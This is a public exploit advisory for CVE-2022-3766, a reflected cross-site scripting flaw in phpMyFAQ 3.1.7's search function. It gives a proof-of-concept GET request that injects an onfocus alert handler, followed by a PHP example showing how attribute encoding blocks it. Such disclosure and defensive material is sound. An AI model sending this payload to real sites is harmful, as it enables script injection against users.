phpMyFAQ 3.1.7 Reflected Cross-Site Scripting (XSS)
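phpMyFAQ 3.1.7 contains a reflected XSS vulnerability. An attacker can trigger malicious behavior such as a pop-up by sending a crafted GET request. The vulnerability is in the search function. Exploitation requires that no security mechanism is enabled and that the target is running an old version. 2025-12-14 22:34:2 Author: cxsecurity.com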

# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpmyfaq/
# Software Link: https://github.com/thorsten/phpmyfaq/
# Version: 3.1.7
# Tested on: Windows
# CVE : CVE-2022-3766

Proof Of Concept
GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29

Additional Conditions:
- Ensure that no security mechanisms (like a web application firewall) are blocking the specific request pattern.
- The application must be running a phpMyFAQ version prior to 3.1.8.

Steps to Reproduce
Log in phpmyfaq.
Send the request.
Observe the result
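The PoC value decodes to a double quote followed by an onfocus attribute, which only has an effect when the search parameter is echoed unencoded inside a quoted HTML attribute. The sketch below is an added example, not phpMyFAQ's code or its actual patch: it contrasts that output pattern with context-appropriate encoding and parses both results to show which attributes the markup ends up with. The helpers render_search_unsafe, render_search_safe and input_attributes are hypothetical, and reflection into an input's value attribute is an assumption inferred from the payload shape.

```php
<?php
// Added example: NOT phpMyFAQ source code. All function names are hypothetical.

// Query string from the PoC on this page, decoded the same way PHP fills $_GET.
parse_str('action=main&search=%22%20onfocus%3D%22alert%281%29', $query);
$search = $query['search'];

// Vulnerable pattern: raw request data concatenated into an attribute value.
// Assumption: the search term is reflected into an <input value="...">.
function render_search_unsafe(string $value): string
{
    return '<input type="text" name="search" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES turns both " and ' into entities, so the value cannot close
// the attribute it is written into.
function render_search_safe(string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $encoded . '">';
}

// Parse the markup with an HTML parser and return the attributes found on
// the first <input>, as name => value.
function input_attributes(string $html): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();

    $attributes = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $attributes[$attr->name] = $attr->value;
    }
    return $attributes;
}

echo "unsafe: ";
print_r(input_attributes(render_search_unsafe($search)));
echo "safe:   ";
print_r(input_attributes(render_search_safe($search)));
```

Run it with the PHP CLI (the dom extension is required). The unsafe rendering parses with an extra onfocus attribute on the input, while the encoded rendering keeps the whole payload as inert text inside value.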


Source: https://cxsecurity.com/issue/WLB-2025120013